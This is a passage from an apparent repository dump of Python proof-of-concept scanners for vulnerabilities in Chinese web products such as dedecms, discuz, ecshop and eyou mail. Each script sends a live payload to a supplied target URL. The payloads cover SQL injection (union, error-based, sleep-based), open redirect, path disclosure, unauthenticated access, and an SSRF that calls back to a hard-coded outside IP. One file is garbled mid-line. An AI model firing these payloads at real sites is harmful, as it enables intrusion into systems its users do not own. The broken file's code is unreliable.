33 | cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
34 | else:
35 | cprint("[-]不存在cmseasy_header_detail_sqli漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = cmseasy_header_detail_sqli_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/dedecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/dedecms/__init__.py
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_download_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms download.php重定向漏洞
5 | referer: http://skyhome.cn/dedecms/357.html
6 | author: Lucifer
7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_download_redirect_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/plus/download.php?open=1&link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
27 | cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 |
29 | else:
30 | cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1])
38 | testVuln.run()
39 |
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_error_trace_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms trace爆路径漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_error_trace_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/data/mysql_error_trace.inc"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = dedecms_error_trace_disclosure_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_recommend_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms recommend.php SQL注入
5 | referer: http://blog.csdn.net/change518/article/details/20564207
6 | author: Lucifer
7 | description: 1.首先执行到plus/recommand.php,包含了include/common.inc.php
8 | 2.只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入
9 | 3.在29行处,URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖
10 | 4.回到recommand.php中,注入语句被带入数据库查询
11 | '''
12 | import sys
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class dedecms_recommend_sqli_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
24 | }
25 | payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
26 | vulnurl = self.url + payload
27 | try:
28 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
29 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
30 | cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
31 | else:
32 | cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = dedecms_recommend_sqli_BaseVerify(sys.argv[1])
40 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_search_typeArr_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms search.php SQL注入漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: dedecms /plus/search.php typeArr存在SQL注入,由于有的waf会拦截自行构造EXP。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_search_typeArr_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Error infos" in req.text and r"Error sql" in req.text:
27 | cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = dedecms_search_typeArr_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_version.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms版本探测
5 | referer: unknow
6 | author: Lucifer
7 | description: dedecms版本探测
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 |
16 | class dedecms_version_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def check_ver(self, arg):
21 | ver_histroy = {'20080307': 'v3 or v4 or v5',
22 | '20080324': 'v5 above',
23 | '20080807': '5.1 or 5.2',
24 | '20081009': 'v5.1sp',
25 | '20081218': '5.1sp',
26 | '20090810': '5.5',
27 | '20090912': '5.5',
28 | '20100803': '5.6',
29 | '20101021': '5.3',
30 | '20111111': 'v5.7 or v5.6 or v5.5',
31 | '20111205': '5.7.18',
32 | '20111209': '5.6',
33 | '20120430': '5.7SP or 5.7 or 5.6',
34 | '20120621': '5.7SP1 or 5.7 or 5.6',
35 | '20120709': '5.6',
36 | '20121030': '5.7SP1 or 5.7',
37 | '20121107': '5.7',
38 | '20130608': 'V5.6-Final',
39 | '20130922': 'V5.7SP1'}
40 | ver_list = sorted(list(ver_histroy.keys()))
41 | ver_list.append(arg)
42 | sorted_ver_list = sorted(ver_list)
43 | return ver_histroy[ver_list[sorted_ver_list.index(arg) - 1]]
44 |
45 | def run(self):
46 | headers = {
47 | "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
48 | }
49 | payload = "/data/admin/ver.txt"
50 | vulnurl = self.url + payload
51 | try:
52 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
53 | m = re.search("^(\d+)$", req.text)
54 | if m:
55 | cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s" % (m.group(1), self.check_ver(m.group(1))),
56 | "green")
57 | else:
58 | cprint("[-]不存在dedecms_version漏洞", "white", "on_grey")
59 |
60 | except:
61 | cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
62 |
63 |
64 | if __name__ == "__main__":
65 | warnings.filterwarnings("ignore")
66 | testVuln = dedecms_version_BaseVerify(sys.argv[1])
67 | testVuln.run()
68 |
--------------------------------------------------------------------------------
/pocs/discuz/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/discuz/__init__.py
--------------------------------------------------------------------------------
/pocs/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz X3 focus.swf flashxss漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件中focus.swf存在flashxss。
8 | '''
9 | import sys
10 | import urllib
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class discuz_focus_flashxss_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | flash_md5 = "c16a7c6143f098472e52dd13de85527f"
25 | payload = "/static/image/common/focus.swf"
26 | vulnurl = self.url + payload
27 | try:
28 | req = urllib.request.urlopen(vulnurl)
29 | data = req.read()
30 | md5_value = hashlib.md5(data).hexdigest()
31 | if md5_value in flash_md5:
32 | cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
33 | else:
34 | cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = discuz_focus_flashxss_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/discuz/discuz_forum_message_ssrf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz论坛forum.php参数message SSRF漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: trs infogate插件 blind XML实体注入。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class discuz_forum_message_ssrf_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
24 | }
25 | time_stamp = time.mktime(datetime.datetime.now().timetuple())
26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
27 | md5_str = m.hexdigest()
28 | payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/"+md5_str+".jpg[/img]&formhash=09cec465"
29 | vulnurl = self.url + payload
30 | try:
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | eye_url = "http://45.76.158.91/web.log"
33 | time.sleep(6)
34 | reqr = requests.get(eye_url, timeout=10, verify=False)
35 | if md5_str in reqr.text:
36 | cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
37 | else:
38 | cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = discuz_forum_message_ssrf_BaseVerify(sys.argv[1])
46 | testVuln.run()
47 |
--------------------------------------------------------------------------------
/pocs/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: discuz问卷调查参数orderby注入漏洞
6 | referer: http://0day5.com/archives/3184/
7 | author: Lucifer
8 | description: 文件plugin.php中,参数orderby存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class discuz_plugin_ques_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
28 | cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 | else:
30 | cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/discuz/discuz_x25_path_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz! X2.5 物理路径泄露漏洞
5 | referer: http://www.uedbox.com/discuzx25-explosive-path/
6 | author: Lucifer
7 | description: 报错导致路径泄露。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class discuz_x25_path_disclosure_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payloads = ["/uc_server/control/admin/db.php",
24 | "/source/plugin/myrepeats/table/table_myrepeats.php",
25 | "/install/include/install_lang.php"]
26 | try:
27 | for payload in payloads:
28 | vulnurl = self.url + payload
29 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
30 | pattern = re.search('Fatal error.* in ([^<]+) on line (\d+)', req.text)
31 | if pattern:
32 | cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+pattern.group(1), "green")
33 | else:
34 | cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = discuz_x25_path_disclosure_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/dreamgallery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/dreamgallery/__init__.py
--------------------------------------------------------------------------------
/pocs/dreamgallery/dreamgallery_album_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dreamgallery album.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件album.php中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dreamgallery_album_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/dream/album.php?id=-1+/*!12345union*/+/*!12345select*/+1,group_concat(version(),0x3a,md5(1234),0x3a,database()),3,4,5,6,7,8,9,10--+"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在dreamgallery album.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在dreamgallery_album_id_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = dreamgallery_album_id_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/ecshop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/ecshop/__init__.py
--------------------------------------------------------------------------------
/pocs/ecshop/ecshop_flow_orderid_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ecshop3.0 flow.php 参数order_id注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2016-0212882
6 | author: Lucifer
7 | description: 文件flow.php中,参数order_id存在SQL注入。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class ecshop_flow_orderid_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/flow.php?step=repurchase"
24 | post_data = {
25 | "order_id":"1/**/Or/**/UpdateXml(1,ConCat(0x7e,(Md5(1234))),0)/**/Or/**/11#"
26 | }
27 | vulnurl = self.url + payload
28 | try:
29 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
30 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
31 | cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\npost: "+json.dumps(post_data, indent=4), "red")
32 | else:
33 | cprint("[-]不存在ecshop_flow_orderid_sqli漏洞", "white", "on_grey")
34 |
35 | except:
36 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 |
38 | if __name__ == "__main__":
39 | warnings.filterwarnings("ignore")
40 | testVuln = ecshop_flow_orderid_sqli_BaseVerify(sys.argv[1])
41 | testVuln.run()
42 |
--------------------------------------------------------------------------------
/pocs/ecshop/ecshop_uc_code_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ecshop uc.php参数code SQL注入
5 | referer: http://www.wooyun.org/bugs/WooYun-2016-174468
6 | author: Lucifer
7 | description: 文件uc.php中,参数code存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class ecshop_uc_code_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"updatexml" in req.text and r"XPATH" in req.text:
27 | cprint("[+]存在ecshop uc.php参数code SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在ecshop_uc_code_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = ecshop_uc_code_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/esccms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/esccms/__init__.py
--------------------------------------------------------------------------------
/pocs/esccms/esccms_selectunitmember_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思教育建站系统未授权访问可查看所有注册用户
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-086704
6 | author: Lucifer
7 | description: 文件selectunitmember.aspx未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class esccms_selectunitmember_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/operationmanage/selectunitmember.aspx"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"doPostBack" in req.text and r"gvUnitMember" in req.text:
27 | cprint("[+]存在易创思教育建站系统未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在esccms_selectunitmember_unauth漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = esccms_selectunitmember_unauth_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/eyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/eyou/__init__.py
--------------------------------------------------------------------------------
/pocs/eyou/eyou_admin_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮Email Defender系统免登陆DBA注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135406
6 | author: Lucifer
7 | description: google关键字"反垃圾邮件网关 - 亿邮通讯", 参数admin_id未经过滤导致SQL注入,DBA权限。
8 | '''
9 | import sys
10 | import time
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class eyou_admin_id_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = {
25 | "admin_id":"a' AND (SELECT * FROM (SELECT(SLEEP(6)))WAcW) AND 'oHiR'='oHiR",
26 | "admin_pass":"a"
27 | }
28 | vulnurl = self.url + r"/php/admin_login.php"
29 | start_time = time.time()
30 | try:
31 | req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
32 | if time.time() - start_time >= 6:
33 | cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
34 | else:
35 | cprint("[-]不存在eyou_admin_id_sqli漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = eyou_admin_id_sqli_BaseVerify(sys.argv[1])
43 | testVuln.run()
44 |
--------------------------------------------------------------------------------
/pocs/eyou/eyou_resetpw.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮件系统重置密码问题暴力破解
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0162892
6 | author: Lucifer
7 | description: 亿邮邮件系统找回密码处,如果用户设置问题密码过于简单可被暴力破解。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class eyou_resetpw_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/?q=resetpw"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if req.status_code == 200 and r"pw_intensity" in req.text:
25 | cprint("[+]存在eyou邮件系统重置密码问题页面...(敏感信息)\tpayload: "+vulnurl, "green")
26 | else:
27 | cprint("[-]不存在eyou_resetpw漏洞", "white", "on_grey")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = eyou_resetpw_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/eyou/eyou_user_kw_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮mail5 user 参数kw SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-074260
6 | author: Lucifer
7 | description: 文件user中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class eyou_user_kw_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/user/?q=help&type=search&page=1&kw=-1%22)UnIoN/**/AlL/**/SeLeCt/**/1,2,3,Md5(1234),5,6,7%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在亿邮mail5 user 参数kw SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在eyou_user_kw_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = eyou_user_kw_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/eyou/eyou_weakpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮箱弱口令列表泄露
5 | referer: http://wooyun.org/bugs/wooyun-2010-061538
6 | author: Lucifer
7 | description: 亿邮邮件系统存在弱口令账户信息泄露,导致非法登录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class eyou_weakpass_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/weakpass.list"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False, allow_redirects=False)
23 | if req.status_code == 200 and r"@" in req.text:
24 | cprint("[+]存在eyou邮件系统信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
25 | else:
26 | cprint("[-]不存在eyou_weakpass漏洞", "white", "on_grey")
27 |
28 | except:
29 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
30 |
31 | payload = "/sysinfo.html"
32 | vulnurl = self.url + payload
33 | try:
34 | req = requests.get(vulnurl, timeout=10, verify=False, allow_redirects=False)
35 | if req.status_code == 200 and r"系统基本信息检查" in req.text:
